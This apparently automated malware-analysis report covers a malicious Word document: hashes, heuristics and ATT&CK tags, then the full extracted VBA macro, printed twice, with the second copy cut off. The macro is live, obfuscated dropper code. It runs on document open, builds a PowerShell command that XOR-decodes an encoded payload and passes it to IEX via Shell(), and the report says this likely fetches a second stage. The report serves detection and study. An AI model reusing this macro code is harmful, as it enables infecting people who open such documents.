Office (OLE) malware analysis — malicious · 8a0da9badc7151b6

MALICIOUS

Office (OLE)

86.2 KB Created: 2018-06-19 17:25:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 20c0137c7c3db22ff8242797b36e5b55 SHA-1: cd81956d846b063d87e9c1bae99d8cff91d7351b SHA-256: 8a0da9badc7151b6eea935d13c686536658fe4bb8edd1f0dfdc2153333fc963d

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is configured to execute a command using Shell(). The script attempts to construct a PowerShell command by concatenating several strings, which likely results in the execution of a second-stage payload. The specific PowerShell command constructed is 'powershell [STrInG]::jOiN( '' ,( '99-49Y61>45', 'm54g46@103%122Z103@41Z34Z48u106g40Y37%45u34-36&51m103u53@38m41%35>40-42&124>99', 'u4>55%61@44&37@40m103>122Y103m41%34-48', 'm106@40-37-45Y34>36g51Z103>20@62u52>51-34g42u105%9u34m51Z105m16g34Z37u4m43-46@34Y' ) )'. This indicates a likely intent to download and execute a further payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

RpGQtb = CDate(vMWbFz + Sin(80034 + 38738) * 79201 * CInt(56623))
iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260)
zaqbc = CByte(YBGYi)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11080 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11080 bytes
SHA-256: `fa2f11a03ec10990a5458811f67e8df59a5361b242f0c4fe55bd513d4e89bfc5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CwHXkhsHNj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KcvZJVMa" Function zJRWMQvS() On Error Resume Next aWzsGB = 40140 wjmrnw = 40624 swLZid = GkMqU tvoBr = CByte(okYZE) HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681)) sdkLUn = CDate(7179) dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45" rlNAv = 26422 FwoiRX = 14812 nHzXOZ = wjFEb dZlWIT = CByte(cijdW) miLFmq = CDate(zXuQGu + Sin(37775 + 11925) * 73698 * CInt(10440)) zsMQa = CDate(73132) rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99" wiKEq = 5144 kRfZFk = 31087 wUvEG = kbbww cjtGH = CByte(nizPT) VhTKY = CDate(OWcYSd + Sin(17972 + 99121) * 42867 * CInt(99882)) inHiuv = CDate(61898) OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48" DmEVfo = 32399 PihjEQ = 2558 wNiCai = TVodhA zqdjR = CByte(WwakV) ftIZS = CDate(bkdRor + Sin(75561 + 10860) * 83163 * CInt(76337)) Riizd = CDate(33781) fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y" zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD End Function Function DQYKkfLBn() On Error Resume Next QwBnz = 46627 mqXsf = 73220 DkmzuQ = QLOds hIZuzz = CByte(mJFLY) FikMwU = CDate(boihCz + Sin(52851 + 76956) * 61841 * CInt(7021)) wIzDc = CDate(63293) jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g" SmrBU = 10559 wcLpz = 59876 hFBwDq = CiLEV IaiIc = CByte(RZwwFn) REwoo = CDate(ppbZz + Sin(4279 + 29870) * 86757 * CInt(20208)) siJZz = CDate(93321) MHjQtmHZh = "48@48Z10" + "5Y35u40@36u" + "47>40Y46m44&4" + "6%35u" + "52-" + "105Y36Y" + "40m42m104g31>13" Qjzqku = 3891 dpTUE = 52223 mdmWqS = CNiCjj XADYai = CByte(cTvwHa) mFAun = CDate(Mrlht + Sin(53878 + 85575) * 60414 * CInt(4236)) tGdDU = CDate(53397) AMzDfFWMAZ = "-15" + "g3&" + "54m13u5" + "4>116" + ">104m7m4" + "7>51&" + "51-55&1" + "25>104u104u48%4" + "8Y48u105m37m4" + "0@40" cmwtC = 61798 ncfkhN = 8556 wqBtY = lDvdZ iWrbrZ = CByte(FRTJwh) CuHcJq = CDate(qGkiw + Sin(64812 + 92351) * 62445 * CInt(84761)) CcHvQ = CDate(20103) wwpnQu = "m42m55@38" + "Y36>44m1" + "05Z36g40m4" + "2Z104m10m119m3u" mbhko = 90836 kwhjXO = 21022 CSdpW = UCzOZU azANWk = CByte(waJidd) lEiPEH = CDate(RHdiO + Sin(65645 + 21340) * 8141 * CInt(91181)) ZNMkn = CDate(56847) DQbTmZuN = "55g22@2m119" + "Y104Z7" + "u47&51%51" + "-55m125%104" + ">104%48Z48@48-" + "105Z47m" + "38Z36m46Y38-" DQYKkfLBn = jPzvVj + MHjQtmHZh + AMzDfFWMAZ + wwpnQu + DQbTmZuN End Function Function mdPiDBrp() On Error Resume Next EihoAi = 95686 zRcpf = 35520 EBaFG = aZbKkK DPvKUS = CByte(hVAJPT) DjwWIa = CDate(lpnJE + Sin(10352 + 31194) * 75571 * CInt(3565)) NHtkw = CDate(70975) nEAHznSmR = "53>34&52Y40" + "-53@51u105>" + "36>" + "40-42@10" VZcYoz = 58666 LscwfM = 99530 uXnXD = jaric OuZFp = CByte(uJlzzX) QQEEP = CDate(JwIaUa + Sin(28218 + 26027) * 30141 * CInt(19536)) hPjbGj = CDate(51601) cIhcLTwSn = "4-45u3g49Z" + "38-4Z30>12-63g1" + "15u104Z" + "7&4" + "7Z51-51Z55" + "Z125Z104g104-4" + "8g48u48%105>3" + "3m53Y38g41%" + "44%52Y42&" + "46%52g52Y46>" XAaDE = 80500 BZokK = 55817 iIKcS = NRlokQ iwiTA = CByte(WLLmz) nBrCa = CDate(loDVj + Sin(5506 + 24424) * 50523 * CInt(60940)) NVdYN = CDate(64780) tNunv = "40Y41g105Z36" + "u40m42u104-49m" + "19%117%2Z3" + "3Z10" + "g104%7g47m" + "51Z51&55m125" + "u10" + "4%104%48" + "@48Z48>105" + "g36" naQlfU = CDate(78314) nuHDO = 70581 UJzIkK = CDate(jBGNi + Sin(62345 + 45040) * 79139 * CInt(3504)) ziiYk = zQBhN WYuvmV = 35961 qckmm = CByte(RzPDFn) wtQMaMol = ">38Y4" + "1-36Z40g42g46&3" + "6Y105m36%40u42u" + "104Z23Y35-46Y" + "6m53u19" + "%29-10" + "4m96m105@2" idDFfi = CDate(35835) iCXAPO = 92885 tBWRYu = CDate(iIWaF + Sin(21400 + 88958) * 31866 * CInt(53447)) mqIqf = jimTtw jNZTO = 28710 FHQlOj = CByte(lFHjmB) mSfFvU = "0&55m" + "43" + "u46>" + "51>111m" + "96&7@96%" + "110%1" + "24u99m15>40Z4" qimbR = CDate(73661) zKmaX = 97495 mMfrjB = CDate(ScDiT + Sin(63004 + 47918) * 39778 * CInt(73735)) fhUTr = PXAzY YLJkz = 51682 LwjoM = CByte(qsrJvO) Gsrrnv = "5@8-48%103Y12" + "2u103m" + "99u49m61m45Y54-" + "46Z105g41%34&6" + "3%51%" UjCoE = CDate(7110) QoILPX = 30448 ZihwVV = CDate(XVFwb + Sin(65326 + 77848) * 89491 * CInt(36301)) DSsQY = UjIBU JaTMwC = 89117 bchqVw = CByte(vkRfuq) irqiknjrVC = "111Z11" + "8%107g103Z1" + "12&112Y127g11" + "7-" + "127@" PNRNU = CDate(93757) szaPX = 27831 MidPlm = CDate(SQDrc + Sin(85851 + 20211) * 11956 * CInt(70943)) zZuPQ = hAVCim lGScBh = 11252 jTIbZ = CByte(sllLb) qMkimN = "115-110>124g99" + "g1Z5-17>" + "41@54Z103>122Y" + "103@99-3" + "4@41Z" + "49@125u51u" + "34&42g55&10" + "3m108" + ">1" + "03Z96%27%96m103" mdPiDBrp = nEAHznSmR + cIhcLTwSn + tNunv + wtQMaMol + mSfFvU + Gsrrnv + irqiknjrVC + qMkimN End Function Function zShwGT() On Error Resume Next OQkVfq = CDate(34192) XpZuc = 64666 KQIYfJ = CDate(kUUoHn + Sin(35024 + 73920) * 24030 * CInt(40856)) VXLQw = sJoGF OlPIY = 35647 iipJcE = CByte(uCjwp) iwEtzjUD = "m108" + "Z103-99%15&" + "40g45-8@48Z103&" + "108@103@96" CfVVV = CDate(61015) lzvmJh = 22284 GCrfu = CDate(fkNal + Sin(2938 + 65878) * 70489 * CInt(94799)) BrchD = RVhdwi cZQiR = 10015 hIwiX = CByte(VUuau) DzLifvCf = "m105u34g63-3" + "4u96@" + "124Y33" + "m40Y53&34m" + "38Y36>47g1" + "11m99>4" + "6Z10&3" + "3@61-4" NkWzQ = CDate(40827) pdCKs = 30951 ilAUX = CDate(frVXo + Sin(35075 + 79670) * 76706 * CInt(71111)) MJRPY = HwXfFr Tjmoq = 71366 uJYMj = CByte(UUdtw) AbtMJu = "6-47u103g4" + "6&41@103&99m" + "21-16g" + "40Y43" dEzrLn = CDate(41850) uoBvD = 28174 qCdwC = CDate(cXHWL + Sin(18725 + 70132) * 21322 * CInt(14042)) XjPGJs = jNqtqr jQszF = 73089 woaIYc = CByte(KowFc) hSwXBZSsc = "@43g110Y60-51" + "u53&" + "62&6" + "0%99@4" + "@55&61u4" + "4&37>40" + "%105Z3%40Y48Y41" zShwGT = iwEtzjUD + DzLifvCf + AbtMJu + hSwXBZSsc End Function Function aEUlvTV() On Error Resume Next MVljzm = CDate(91548) KVOmmj = 54901 mFVwN = CDate(BUWMK + Sin(79205 + 89482) * 61613 * CInt(51352)) qpErdE = WDZJs FiqwC = 45344 TKSwAU = CByte(YPswPu) WSOWz = "u43g40Z38Z35" + "%1&46Z43%34&111" + "Y99g46Z10m33u6" + "1Y46@47" + ">10" + "5Z19m40m20&51Y5" + "3@46Y41" zwunBI = CDate(37912) bCHTW = 89831 dUqsI = CDate(RnilU + Sin(67636 + 66650) * 40337 * CInt(34166)) icwIPb = uPpPc TSOaF = 17725 mEEqj = CByte(sqHhDm) ZaaSJplCn = "%32%111&1" + "10Z1" + "07Y103-" + "99-1&" + "5-17Y41g54" + ">110" + "Z124m20" wcSwo = CDate(62750) OwXhaC = 48177 SGIdL = CDate(kkERhM + Sin(3813 + 22707) * 22617 * CInt(22375)) mvLOtE = DHXSV ilVJd = 55097 iDzchw = CByte(YKLBC) JCrjEfqz = "m51-38%" + "53Y5" + "1Y" + "106@23m53g40m36" + "g3" + "4g52" + "m52>103Z99" aEKSOz = CDate(66258) VRzLUT = 85857 rsijQU = CDate(wztZL + Sin(70840 + 28161) * 13106 * CInt(44491)) EcXsAI = aCvMp FUKjzH = 35380 oAAkRc = CByte(tVBZB) CriLAiBD = "Z1-5>17%41Y54u" + "124%37Y53m" + "34m38g44>124g" + "58Y3" + "6m3" + "8m" + "51g36u47Y60g4" + "8m53g46u" + "51" + "u34m106%47>4" INZJHH = CDate(76523) BHqwV = 15543 BBQzE = CDate(DVhviz + Sin(6567 + 71513) * 89896 * CInt(69698)) CHvzz = HXotni pOUvoG = 89455 pILzm = CByte(KWLCqk) DpzlLw = "0Y52m51@1" + "03&99-24@105" + "m2-63%36-34-" + "55Z5" + "1Z46@40>41>" + "105Z10-34&52>" + "52Z38Y32g34Z12" + "4u58%" + "58'.SPlit('" + "uZYgm" nPmAG = CDate(31875) iEHBdG = 22775 HzopPT = CDate(nvVZv + Sin(74580 + 25804) * 42474 * CInt(41034)) mkObnl = kXRRrP AvESZi = 98227 aWSouF = CByte(sHCVJb) oTvrTbiSS = "%@>&-' )\| FOr" + "EAcH" + "{[cHar] ($_ -bx" + "OR'0x4" + "7' " aEUlvTV = WSOWz + ZaaSJplCn + JCrjEfqz + CriLAiBD + DpzlLw + oTvrTbiSS End Function Function CrlzYbbdkT() On Error Resume Next ClwjsZ = CDate(99898) lwEMhv = 28149 uwruHz = CDate(WbEpW + Sin(65570 + 28015) * 99600 * CInt(94924)) PdtAw = aumiL fpWOH = 16632 DRusOW = CByte(ETLDF) BzBkSU = ") } " + "))\| iEX" CrlzYbbdkT = BzBkSU End Function Function vPKkpTZuAwr() On Error Resume Next sNREjq = JMYLiH obDps = CDate(40495) FaCtzB = CDate(rIaUzf + Sin(1747 + 20559) * 27222 * CInt(34755)) Nmmzm = 13537 Swsubj = CByte(HElVpz) lwNVpB = 54376 dNlGz = CByte(PAqMH) BvijNf = tmtUjW ackZpo = 41115 pPwKAp = 36466 oUjZTa = CDate(26069) noYQHK = CDate(CIZqv + Sin(82692 + 99838) * 89494 * CInt(95909)) oZidRi = CByte(CaJvWU) tavsh = ftwfXf GkEsrN = 39046 ojNsRV = 23618 DTlhQ = CDate(37536) aFJbB = CDate(uSVOI + Sin(64266 + 77638) * 9896 * CInt(90526)) npfLIS = CByte(HVaZbZ) bOcjS = muJZs ZLqQjA = 67343 CPXok = 9630 cWjPY = CDate(28019) Dowraa = CDate(KYEzuk + Sin(11599 + 17602) * 98669 * CInt(22970)) hoJTXX = CByte(wABTWi) PhPqP = iEPBa fLrqdV = 76381 hrAzw = 42891 jRRRk = CDate(59843) DTWIQr = CDate(jNfmvq + Sin(9695 + 11092) * 99887 * CInt(12268)) End Function Function mcGnivqsYDi() On Error Resume Next aozaRL = CByte(UzWNEF) JYkrtU = QhjvE DIVFW = 78265 HjBMm = 41601 LboJdz = CDate(51756) zbkMv = CDate(jfCDt + Sin(67930 + 6246) * 30464 * CInt(30941)) KPQRrbKkSZ = PiJpfkl + Chr(QEnwvl + 80 + KIHjbNfLY) JKWbw = CByte(MzFPj) FztBD = FWLJN aAOFz = 39451 pFPhl = 34203 fLTiO = CDate(36489) RwuYdj = CDate(rlEICG + Sin(53711 + 1429) * 12239 * CInt(12282)) wNdiiE = CByte(SJTmQ) iIIHru = jZYUm CpLRo = 48194 mtuUT = 52386 qSHVSi = CDate(30320) IoAbjr = CDate(SLiZZ + Sin(16385 + 14046) * 86004 * CInt(85881)) mcGnivqsYDi = LBYzIinS + KPQRrbKkSZ + zJRWMQvS + DQYKkfLBn + mdPiDBrp + zShwGT + aEUlvTV + CrlzYbbdkT rmjZO = CByte(nVHVQt) fPTEw = fwOrv UKOdcv = 32007 GwNtAz = 80071 sGSAjm = CDate(52333) OqSTPV = CDate(uPHuFG + Sin(84667 + 74929) * 78584 * CInt(89352)) End Function Function AmhmfzhNjrb(oDmPls) On Error Resume Next oZATd = CByte(IGLQK) RnLDC = SBVRj UbWbm = 95645 zXHas = 27567 uoSHnz = CDate(41966) jqdPrY = CDate(YIHsLh + Sin(4545 + 83205) * 44890 * CInt(25324)) wMswv = CByte(Piibfo) lVEso = GJion usERF = 17709 lcFRjw = 8915 wpCWr = CDate(87021) RpGQtb = CDate(vMWbFz + Sin(80034 + 38738) * 79201 * CInt(56623)) iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260) zaqbc = CByte(YBGYi) TDMmis = jijIzS WjMNj = 29669 cDTSU = 42918 AGKjw = CDate(74207) IcjAj = CDate(KjBRSC + Sin(68839 + 43023) * 54874 * CInt(2163)) End Function Sub AutoOpen() On Error Resume Next WzCYFi = CByte(taVij) unCcGr = ARGLnO olsAbt = 60502 JrRQX = 68823 TzDCjj = CDate(97244) VXIslF = CDate(MuVGI + Sin(95158 + 20355) * 68046 * CInt(56827)) Application.Run BZVbjsT + "AmhmfzhNjrb" + mPPiUDlwoE, lbckiaczUbj + mcGnivqsYDi + RTazZ AJOaSp = CByte(vSPjas) vstpZ = vTmzYJ zKGCv = 98218 YHhfz = 46592 zzYfo = CDate(34642) EKHjE = CDate(PvvasK + Sin(48994 + 32202) * 93806 * CInt(95006)) End Sub

SHA-256: fa2f11a03ec10990a5458811f67e8df59a5361b242f0c4fe55bd513d4e89bfc5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CwHXkhsHNj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KcvZJVMa"
Function zJRWMQvS()
On Error Resume Next
aWzsGB = 40140
wjmrnw = 40624
swLZid = GkMqU
tvoBr = CByte(okYZE)
HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681))
sdkLUn = CDate(7179)
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
rlNAv = 26422
FwoiRX = 14812
nHzXOZ = wjFEb
dZlWIT = CByte(cijdW)
miLFmq = CDate(zXuQGu + Sin(37775 + 11925) * 73698 * CInt(10440))
zsMQa = CDate(73132)
rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99"
wiKEq = 5144
kRfZFk = 31087
wUvEG = kbbww
cjtGH = CByte(nizPT)
VhTKY = CDate(OWcYSd + Sin(17972 + 99121) * 42867 * CInt(99882))
inHiuv = CDate(61898)
OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48"
DmEVfo = 32399
PihjEQ = 2558
wNiCai = TVodhA
zqdjR = CByte(WwakV)
ftIZS = CDate(bkdRor + Sin(75561 + 10860) * 83163 * CInt(76337))
Riizd = CDate(33781)
fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y"
zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD
End Function
Function DQYKkfLBn()
On Error Resume Next
QwBnz = 46627
mqXsf = 73220
DkmzuQ = QLOds
hIZuzz = CByte(mJFLY)
FikMwU = CDate(boihCz + Sin(52851 + 76956) * 61841 * CInt(7021))
wIzDc = CDate(63293)
jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g"
SmrBU = 10559
wcLpz = 59876
hFBwDq = CiLEV
IaiIc = CByte(RZwwFn)
REwoo = CDate(ppbZz + Sin(4279 + 29870) * 86757 * CInt(20208))
siJZz = CDate(93321)
MHjQtmHZh = "48@48Z10" + "5Y35u40@36u" + "47>40Y46m44&4" + "6%35u" + "52-" + "105Y36Y" + "40m42m104g31>13"
Qjzqku = 3891
dpTUE = 52223
mdmWqS = CNiCjj
XADYai = CByte(cTvwHa)
mFAun = CDate(Mrlht + Sin(53878 + 85575) * 60414 * CInt(4236))
tGdDU = CDate(53397)
AMzDfFWMAZ = "-15" + "g3&" + "54m13u5" + "4>116" + ">104m7m4" + "7>51&" + "51-55&1" + "25>104u104u48%4" + "8Y48u105m37m4" + "0@40"
cmwtC = 61798
ncfkhN = 8556
wqBtY = lDvdZ
iWrbrZ = CByte(FRTJwh)
CuHcJq = CDate(qGkiw + Sin(64812 + 92351) * 62445 * CInt(84761))
CcHvQ = CDate(20103)
wwpnQu = "m42m55@38" + "Y36>44m1" + "05Z36g40m4" + "2Z104m10m119m3u"
mbhko = 90836
kwhjXO = 21022
CSdpW = UCzOZU
azANWk = CByte(waJidd)
lEiPEH = CDate(RHdiO + Sin(65645 + 21340) * 8141 * CInt(91181))
ZNMkn = CDate(56847)
DQbTmZuN = "55g22@2m119" + "Y104Z7" + "u47&51%51" + "-55m125%104" + ">104%48Z48@48-" + "105Z47m" + "38Z36m46Y38-"
DQYKkfLBn = jPzvVj + MHjQtmHZh + AMzDfFWMAZ + wwpnQu + DQbTmZuN
End Function
Function mdPiDBrp()
On Error Resume Next
EihoAi = 95686
zRcpf = 35520
EBaFG = aZbKkK
DPvKUS = CByte(hVAJPT)
DjwWIa = CDate(lpnJE + Sin(10352 + 31194) * 75571 * CInt(3565))
NHtkw = CDate(70975)
nEAHznSmR = "53>34&52Y40" + "-53@51u105>" + "36>" + "40-42@10"
VZcYoz = 58666
LscwfM = 99530
uXnXD = jaric
OuZFp = CByte(uJlzzX)
QQEEP = CDate(JwIaUa + Sin(28218 + 26027) * 30141 * CInt(19536))
hPjbGj = CDate(51601)
cIhcLTwSn = "4-45u3g49Z" + "38-4Z30>12-63g1" + "15u104Z" + "7&4" + "7Z51-51Z55" + "Z125Z104g104-4" + "8g48u48%105>3" + "3m53Y38g41%" + "44%52Y42&" + "46%52g52Y46>"
XAaDE = 80500
BZokK = 55817
iIKcS = NRlokQ
iwiTA = CByte(WLLmz)
nBrCa = CDate(loDVj + Sin(5506 + 24424) * 50523 * CInt(60940))
NVdYN = CDate(64780)
tNunv = "40Y41g105Z36" + "u40m42u104-49m" + "19%117%2Z3" + "3Z10" + "g104%7g47m" + "51Z51&55m125" + "u10" + "4%104%48" + "@48Z48>105" + "g36"
naQlfU = CDate(78314)
nuHDO = 70581
UJzIkK = CDate(jBGNi + Sin(62345 + 45040) * 79139 * CInt(3504))
ziiYk = zQBhN
WYuvmV = 35961
qckmm = CByte(RzPDFn)
wtQMaMol = ">38Y4" + "1-36Z40g42g46&3" + "6Y105m36%40u42u" + "104Z23Y35-46Y" + "6m53u19" + "%29-10" + "4m96m105@2"
idDFfi = CDate(35835)
iCXAPO = 92885
tBWRYu = CDate(iIWaF + Sin(21400 + 88958) * 31866 * CInt(53447))
mqIqf = jimTtw
jNZTO = 28710
FHQlOj = CByte(lFHjmB)
mSfFvU = "0&55m" + "43" + "u46>" + "51>111m" + "96&7@96%" + "110%1" + "24u99m15>40Z4"
qimbR = CDate(73661)
zKmaX = 97495
mMfrjB = CDate(ScDiT + Sin(63004 + 47918) * 39778 * CInt(73735))
fhUTr = PXAzY
YLJkz = 51682
LwjoM = CByte(qsrJvO)
Gsrrnv = "5@8-48%103Y12" + "2u103m" + "99u49m61m45Y54-" + "46Z105g41%34&6" + "3%51%"
UjCoE = CDate(7110)
QoILPX = 30448
ZihwVV = CDate(XVFwb + Sin(65326 + 77848) * 89491 * CInt(36301))
DSsQY = UjIBU
JaTMwC = 89117
bchqVw = CByte(vkRfuq)
irqiknjrVC = "111Z11" + "8%107g103Z1" + "12&112Y127g11" + "7-" + "127@"
PNRNU = CDate(93757)
szaPX = 27831
MidPlm = CDate(SQDrc + Sin(85851 + 20211) * 11956 * CInt(70943))
zZuPQ = hAVCim
lGScBh = 11252
jTIbZ = CByte(sllLb)
qMkimN = "115-110>124g99" + "g1Z5-17>" + "41@54Z103>122Y" + "103@99-3" + "4@41Z" + "49@125u51u" + "34&42g55&10" + "3m108" + ">1" + "03Z96%27%96m103"
mdPiDBrp = nEAHznSmR + cIhcLTwSn + tNunv + wtQMaMol + mSfFvU + Gsrrnv + irqiknjrVC + qMkimN
End Function
Function zShwGT()
On Error Resume Next
OQkVfq = CDate(34192)
XpZuc = 64666
KQIYfJ = CDate(kUUoHn + Sin(35024 + 73920) * 24030 * CInt(40856))
VXLQw = sJoGF
OlPIY = 35647
iipJcE = CByte(uCjwp)
iwEtzjUD = "m108" + "Z103-99%15&" + "40g45-8@48Z103&" + "108@103@96"
CfVVV = CDate(61015)
lzvmJh = 22284
GCrfu = CDate(fkNal + Sin(2938 + 65878) * 70489 * CInt(94799))
BrchD = RVhdwi
cZQiR = 10015
hIwiX = CByte(VUuau)
DzLifvCf = "m105u34g63-3" + "4u96@" + "124Y33" + "m40Y53&34m" + "38Y36>47g1" + "11m99>4" + "6Z10&3" + "3@61-4"
NkWzQ = CDate(40827)
pdCKs = 30951
ilAUX = CDate(frVXo + Sin(35075 + 79670) * 76706 * CInt(71111))
MJRPY = HwXfFr
Tjmoq = 71366
uJYMj = CByte(UUdtw)
AbtMJu = "6-47u103g4" + "6&41@103&99m" + "21-16g" + "40Y43"
dEzrLn = CDate(41850)
uoBvD = 28174
qCdwC = CDate(cXHWL + Sin(18725 + 70132) * 21322 * CInt(14042))
XjPGJs = jNqtqr
jQszF = 73089
woaIYc = CByte(KowFc)
hSwXBZSsc = "@43g110Y60-51" + "u53&" + "62&6" + "0%99@4" + "@55&61u4" + "4&37>40" + "%105Z3%40Y48Y41"
zShwGT = iwEtzjUD + DzLifvCf + AbtMJu + hSwXBZSsc
End Function
Function aEUlvTV()
On Error Resume Next
MVljzm = CDate(91548)
KVOmmj = 54901
mFVwN = CDate(BUWMK + Sin(79205 + 89482) * 61613 * CInt(51352))
qpErdE = WDZJs
FiqwC = 45344
TKSwAU = CByte(YPswPu)
WSOWz = "u43g40Z38Z35" + "%1&46Z43%34&111" + "Y99g46Z10m33u6" + "1Y46@47" + ">10" + "5Z19m40m20&51Y5" + "3@46Y41"
zwunBI = CDate(37912)
bCHTW = 89831
dUqsI = CDate(RnilU + Sin(67636 + 66650) * 40337 * CInt(34166))
icwIPb = uPpPc
TSOaF = 17725
mEEqj = CByte(sqHhDm)
ZaaSJplCn = "%32%111&1" + "10Z1" + "07Y103-" + "99-1&" + "5-17Y41g54" + ">110" + "Z124m20"
wcSwo = CDate(62750)
OwXhaC = 48177
SGIdL = CDate(kkERhM + Sin(3813 + 22707) * 22617 * CInt(22375))
mvLOtE = DHXSV
ilVJd = 55097
iDzchw = CByte(YKLBC)
JCrjEfqz = "m51-38%" + "53Y5" + "1Y" + "106@23m53g40m36" + "g3" + "4g52" + "m52>103Z99"
aEKSOz = CDate(66258)
VRzLUT = 85857
rsijQU = CDate(wztZL + Sin(70840 + 28161) * 13106 * CInt(44491))
EcXsAI = aCvMp
FUKjzH = 35380
oAAkRc = CByte(tVBZB)
CriLAiBD = "Z1-5>17%41Y54u" + "124%37Y53m" + "34m38g44>124g" + "58Y3" + "6m3" + "8m" + "51g36u47Y60g4" + "8m53g46u" + "51" + "u34m106%47>4"
INZJHH = CDate(76523)
BHqwV = 15543
BBQzE = CDate(DVhviz + Sin(6567 + 71513) * 89896 * CInt(69698))
CHvzz = HXotni
pOUvoG = 89455
pILzm = CByte(KWLCqk)
DpzlLw = "0Y52m51@1" + "03&99-24@105" + "m2-63%36-34-" + "55Z5" + "1Z46@40>41>" + "105Z10-34&52>" + "52Z38Y32g34Z12" + "4u58%" + "58'.SPlit('" + "uZYgm"
nPmAG = CDate(31875)
iEHBdG = 22775
HzopPT = CDate(nvVZv + Sin(74580 + 25804) * 42474 * CInt(41034))
mkObnl = kXRRrP
AvESZi = 98227
aWSouF = CByte(sHCVJb)
oTvrTbiSS = "%@>&-' )| FOr" + "EAcH" + "{[cHar] ($_ -bx" + "OR'0x4" + "7' "
aEUlvTV = WSOWz + ZaaSJplCn + JCrjEfqz + CriLAiBD + DpzlLw + oTvrTbiSS
End Function
Function CrlzYbbdkT()
On Error Resume Next
ClwjsZ = CDate(99898)
lwEMhv = 28149
uwruHz = CDate(WbEpW + Sin(65570 + 28015) * 99600 * CInt(94924))
PdtAw = aumiL
fpWOH = 16632
DRusOW = CByte(ETLDF)
BzBkSU = ") } " + "))| iEX"
CrlzYbbdkT = BzBkSU
End Function

Function vPKkpTZuAwr()
On Error Resume Next
sNREjq = JMYLiH
obDps = CDate(40495)
FaCtzB = CDate(rIaUzf + Sin(1747 + 20559) * 27222 * CInt(34755))
Nmmzm = 13537
Swsubj = CByte(HElVpz)
lwNVpB = 54376
dNlGz = CByte(PAqMH)
BvijNf = tmtUjW
ackZpo = 41115
pPwKAp = 36466
oUjZTa = CDate(26069)
noYQHK = CDate(CIZqv + Sin(82692 + 99838) * 89494 * CInt(95909))
oZidRi = CByte(CaJvWU)
tavsh = ftwfXf
GkEsrN = 39046
ojNsRV = 23618
DTlhQ = CDate(37536)
aFJbB = CDate(uSVOI + Sin(64266 + 77638) * 9896 * CInt(90526))
npfLIS = CByte(HVaZbZ)
bOcjS = muJZs
ZLqQjA = 67343
CPXok = 9630
cWjPY = CDate(28019)
Dowraa = CDate(KYEzuk + Sin(11599 + 17602) * 98669 * CInt(22970))
hoJTXX = CByte(wABTWi)
PhPqP = iEPBa
fLrqdV = 76381
hrAzw = 42891
jRRRk = CDate(59843)
DTWIQr = CDate(jNfmvq + Sin(9695 + 11092) * 99887 * CInt(12268))
End Function
Function mcGnivqsYDi()
